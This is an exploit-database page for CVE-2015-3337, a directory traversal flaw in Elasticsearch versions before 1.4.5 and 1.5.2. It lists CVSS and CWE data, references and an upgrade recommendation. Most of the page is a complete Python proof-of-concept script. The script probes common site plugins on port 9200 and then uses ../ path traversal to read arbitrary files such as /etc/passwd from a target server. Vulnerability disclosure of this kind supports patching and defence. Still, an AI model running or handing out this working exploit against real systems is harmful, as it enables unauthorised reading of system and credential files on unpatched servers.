header-logo
Suggest Exploit
vendor:
ElasticSearch
by:
John Heasman and Pedro Andujar
9
CVSS
HIGH
ElasticSearch Remote Code Execution
22
CWE
Product Name: ElasticSearch
Affected Version From: All versions prior to 1.5.2 and 1.4.5
Affected Version To: 1.5.2 and 1.4.5
Patch Exists: YES
Related CWE: CVE-2015-3337
CPE: elasticsearch
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-a71e7440-1ba3-11e5-b43d-002590263bf5/
Other Scripts: N/A
Tags: packetstorm,edb,cve,cve2015,elastic,lfi,elasticsearch,plugin
CVSS Metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
Nuclei References: https://www.exploit-db.com/exploits/37054/https://www.elastic.co/community/securityhttp://www.debian.org/security/2015/dsa-3241https://nvd.nist.gov/vuln/detail/CVE-2015-3337http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
Nuclei Metadata: {'max-request': 1, 'vendor': 'elasticsearch', 'product': 'elasticsearch'}
Platforms Tested: Linux
2015

Crappy PoC for CVE-2015-3337

Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.

Mitigation:

Upgrade to ElasticSearch version 1.5.2 or 1.4.5 or later.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
        sys.exit()

port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
		socket.setdefaulttimeout(3)
		s = socket.socket()
		s.connect((host,port))
		s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
			"Host: %s\n\n" % (plugin, fpath, host))
		file = s.recv(2048)
		print "	[*] Trying to retrieve %s:" % fpath
		if ("HTTP/1.0 200 OK" in file):
			print "\n%s" % file
		else:
		    print "[-] File Not Found, No Access Rights or System Not Vulnerable"

def pfind(plugin):
	try:
		socket.setdefaulttimeout(3)
		s = socket.socket()
		s.connect((host,port))
		s.send("GET /_plugin/%s/ HTTP/1.0\n"
			"Host: %s\n\n" % (plugin, host))
		file = s.recv(16)
		print "[*] Trying to find plugin %s:" % plugin
		if ("HTTP/1.0 200 OK" in file):
			print "[+] Plugin found!"
			grab(plugin)
			sys.exit()
		else:
		    print "[-]  Not Found "
	except Exception, e:
		print "[-] Error connecting to %s: %s" % (host, e)
		sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
	pfind(plugin)

Navigation

Suggest Exploit

Services By CQR